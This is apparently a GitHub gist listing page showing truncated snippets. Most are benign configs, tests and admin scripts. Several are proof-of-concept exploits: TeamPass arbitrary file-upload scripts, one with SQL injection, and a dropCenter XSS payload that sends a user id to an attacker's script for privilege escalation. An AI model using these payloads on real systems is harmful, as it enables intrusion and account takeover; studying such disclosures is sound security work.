@leblanc-simon
leblanc-simon / build.properties
Created November 9, 2011 22:20
propel example bug with query_cache
# Project name
propel.project = OpenSondage
# Database driver
propel.database = mysql
propel.mysql.tableType = MyISAM
propel.mysql.tableEngineKeyword = ENGINE
propel.tablePrefix =
#################################################
<html>
<head>
<title>Hack TeamPass</title>
</head>
<body>
<form action="http://teampass/includes/libraries/uploadify/uploadify.php" method="post" enctype="multipart/form-data">
<input type="file" name="Filedata" />
<input type="hidden" name="type_upload" value="import_items_from_csv" />
<input type="hidden" name="folder" value="/files" />
<input type="submit">
leblanc-simon / hack_teampass.php
Created March 17, 2012 16:06
Hack teampass via curl
<?php
$url = 'http://localhost/nilsteampassnet-TeamPass-65f3167/';
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $url.'includes/libraries/uploadify/uploadify.php');
curl_setopt($curl, CURLOPT_POST, true);
$post = array(
'Filedata' => '@info.php',
'type_upload' => 'import_items_from_csv',
'folder' => '/nilsteampassnet-TeamPass-65f3167/files',
leblanc-simon / hack_teampass.php
Created April 1, 2012 23:18
Hack last teampass version
<?php
$url = 'http://localhost/teampass/';
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $url.'includes/libraries/uploadify/uploadify.php?key_tempo=lol&user_id='.urlencode('0 UNION SELECT \'lol\''));
curl_setopt($curl, CURLOPT_POST, true);
$post = array(
'Filedata' => '@info.php',
'type_upload' => 'import_items_from_csv',
'folder' => '/teampass/files',
leblanc-simon / 401_test.py
Created July 31, 2012 19:21
HTTP status return with prestapyt
from prestapyt import PrestaShopWebServiceError, PrestaShopWebService, PrestaShopWebServiceDict
prestashop = PrestaShopWebServiceDict('http://localhost/api', '098F6BCD4621D373CADE4E832627B4F6')
prestashop.search('addresses') # 401 + 200 : OK, it's the first call
prestashop.get('addresses', 4) # 200 only: OK
prestashop.get('addresses', 6) # 200 only: OK
prestashop.search('orders') # 401 + 200 : NOK, it must be only 200
prestashop.get('orders', 2) # 200 only: OK
prestashop.get('orders', 5) # 200 only: OK
leblanc-simon / shaarli_api_test.php
Last active December 20, 2015 13:19
Shaarli API usage and test
<?php
/*
Usage of API :
- Search / Get links :
* method: GET
* URL : ?do=api (add &token=[hash_hmac(sha256, api_key, api_hash)] to add private link in search)
* return: JSON (object or array)
* &key=[linkdate]:
leblanc-simon / dropcenter_exploit.php
Last active December 21, 2015 11:49
XSS + privilege escalation
<?php
# Exploit Title: dropCenter all version : privilege escalation
# If this is the last version (after 2013-08-20), use permanent XSS to hack the website :
#
# - Encoded URL : http://localhost/dropCenter/index.php?error=%22%29%3B%24%28document%29.ready%28function%28%29%7B%24%28%27body%27%29.append%28%27%3Cimg+src%3D%22http%3A%2F%2Flocalhost%2Fdropcenter_exploit.php%3Fuser%3D%27%2B%24%28%27form%5Baction%5E%3D%22php%2Faction.php%3Faction%3DsaveSettings%22%5D%27%29.attr%28%27action%27%29.match%28%2Fuser%3D%28.%2A%29%2F%29%5B1%5D%2B%27%22%2F%3E%27%29%7D%29%3Bfunction+test%28%29%7B%7Dtest%28%22
#
# - Decoded URL : http://localhost/dropCenter/index.php?error=");$(document).ready(function(){$('body').append('<img src="http://localhost/dropcenter_exploit.php?user='+$('form[action^="php/action.php?action=saveSettings"]').attr('action').match(/user=(.*)/)[1]+'"/>')});function test(){}test("
#
# Date: 2013-08-02
# Author: leviathan
leblanc-simon / backup_manthly.sh
Created February 6, 2014 00:49
Backup monthly the last BackupPC dump
#!/bin/bash
hosts="host1 host2 host3"
shares="home etc root"
base_path="/home/backup/"
month=`date +%m`
command_tar='sudo -u backuppc /usr/share/backuppc/bin/BackupPC_tarCreate -h %host% -n -1 -s /%share% . > '
for host in ${hosts}; do
#!/bin/bash
directory="/var/www/"
result="${directory}website-integrity/`date '+%Y-%m-%d'`.md5sum"
old_result="${directory}website-integrity/`date '+%Y-%m-%d' --date '1 days ago'`.md5sum"
website_directory="${directory}httpdocs/"
find ${website_directory} -type f -exec md5sum {} \; > ${result}
today=`md5sum ${result} | awk '{print $1}'`
leblanc-simon / ip.php
Last active August 29, 2015 13:56
Simple IP visualisation
<?php
header("Cache-Control: no-cache, must-revalidate");
header("Expires: Sat, 26 Jul 1997 05:00:00 GMT");
/**
* @see https://gist.github.com/cballou/2201933
*/
function getIp()
{
$ip_keys = array('HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR');